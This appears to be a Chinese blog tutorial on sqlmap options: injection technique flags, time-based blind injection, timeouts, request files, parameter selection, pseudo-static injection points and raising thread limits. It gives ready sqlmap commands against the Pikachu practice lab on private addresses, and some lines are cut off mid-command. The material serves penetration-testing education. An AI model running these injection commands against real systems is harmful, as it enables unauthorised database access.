一、–technique 使用指定的注入方式
在一些项目中,难免会遇上网络反应缓慢,idc还有检测sqlmap的能力。作为一个专业的渗透测试人员,必须做到快准狠。
有些SQL注入点只允许时间注入,这时指定SQLMAP的注入类型为T
以下是--technique 参数的值的解释:
B:Boolean-basedblindSQLinjection(布尔型注入)
E:Error-basedSQLinjection(报错型注入)
U:UNIONquerySQLinjection(可联合查询注入)
S:StackedqueriesSQLinjection(可多语句查询注入)
T:Time-basedblindSQLinjection(基于时间延迟注入)
Q:InlineSQLInjection(内联注入)
二、使用基于时间的延时注入
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --technique=T
支持多种注入检测,默认是全部:
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --technique=BEUT
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/d21cecdaca098b6932bffdf07c4a9802.png)
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/97bcba9669153367f8c77c3e18d7545b.png)
三、设置超时时间
--time-out 这个参数是设置超时时间 有得网页响应比较慢,可以使用这个参数来增大访问超时的时间。默认是30
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --timeout=10
四、读取文本进行SQL注入检测
sqlmap -r post.txt
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/9adfeb6c75a7ae78e500e1afb47e79f2.png)
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/6a23edf96e8c1cadc411f193e0f754fd.png)
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/dd5cf70d568572a223d8aee68983eda6.png)
五、指定参数进行注入
-p 指定需要测试的参数
sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name --dbms mysql -v 1
使用*进行注入
如果url是伪静态的时 ,可以使用*号表示这是检测的地方;
sqlmap -u "http://192.168.0.103/06/vul/sqli/id/1*./html
POST注入
sqlmap -u "http:
六、修改默认最大线程
sqlmap/lib/core/settings.py
默认最大线程是10 可以设置线程最大为100
MAX_NUMBER_OF_THREADS = 100
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/548deacdbd436389ac40e17b904ab6ae.png)